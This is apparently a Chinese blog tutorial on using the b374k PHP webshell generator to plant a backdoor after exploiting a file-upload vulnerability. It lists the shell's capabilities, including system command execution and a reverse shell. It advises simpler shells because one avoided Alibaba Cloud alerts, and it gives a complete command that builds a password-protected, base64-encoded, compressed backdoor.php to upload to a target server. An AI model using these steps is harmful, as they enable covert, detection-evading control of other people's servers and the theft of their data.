PHP后门生成工具b374k的使用方法
尽管现在互联网技术日新月异,但php类型的网站仍然占比较多(php建站工具丰富),与之而来的是php站点各种漏洞,本篇文章将会描述当你获取一个上传漏洞时,应该选择哪种php webshell进行控制,这里介绍b374k的php后门生成工具。
其实在kali2.0的”/usr/share/webshells/php“系统目录中也有几个可用的shell,另外你也可以使用weevely。
2. 特性
- 文件管理(查看、编辑、删除、重命名、上传、下载、归档等等)
- 搜索文件、目录、文件内容(支持正则表达式)
- 运行系统命令
- 脚本运行(perl、php、python、ruby等等)
- 反向连接的shell(可以使用metasploit监听)
- 简单的数据包嗅探
- 简单的数据库连接与解释器
- 任务进程列表
- 邮件服务(可发送归档附件)
由上面可知,b374k的确很强大,提供了丰富的功能、友好的界面操作方式。但优点越多的同时缺点暴露的就越多,b374k由于涉及很多系统函数,使用面广,所以很容易被站点所在的系统发现并查杀。所以往往越简单的shell越不容易被发现,例如开头所说的kali自带的几个webshell。
我曾经在阿里云服务器中测试过,当上传b374k的后门shell时,阿里云系统几秒钟就发现并进行的告警,当我使用kali2.0自带的qsd-php-backdoor.php时却没有任何告警信息,从这点可以看出越简单越好,其实仅仅提供一个简单的shell就可以做很多事情。
3. 使用
b374k作为生成shell后门的工具,提供了两种生成方式,一种给予界面的方式,一种是命令行的方式。给予界面的需要web服务器的支持,命令方式的需要php解释器的支持,下面是这两种方式的使用方法。
3.1 给予界面的
将克隆的b374k的目录放置到目标服务器中,通过域名访问界面生成地址,如://vinny.cc/b374k,配置好相应参数,点击run按钮即可进入webshell控制台,如下:
其实这种生成方式并不靠谱,需要把整个b374k的程序放到目标机器上,很容易被查杀和利用,并不推荐使用这种方式进行webshell的使用。
3.2 给予命令行生成的
$ php -f index.php
b374k shell packer 0.4
options :
-o filename 保存的后门文件
-p password 访问的密码
-t theme 使用哪种主题
-m modules 使用的模块
-s 去除注释和空白区域
-b 是否用base64编码
-z [no|gzdeflate|gzencode|gzcompress] 压缩方式
-c [0-9] 压缩级别
-l 列出可用的模块
-k 列出可用的主题
# -o 生成backdoor.php文件后门
# -p 后门的访问密码是123321
# -s 去除注释和空白区域
# -b 启用base64压缩
# -z 使用gzcompress的压缩方式
# -c 压缩级别为最高的9
php -f index.php -- -o backdoor.php -p 123321 -s -b -z gzcompress -c 9
生成好之后将backdoor.php上传至目标服务器中,使用密码123321进行访问即可看见b374k的界面操作。
版权所有,本作品采用知识共享署名-非商业性使用 3.0 未本地化版本许可协议进行许可。转载请注明出处:https://www.wangjun.dev//2016/05/php-b374k/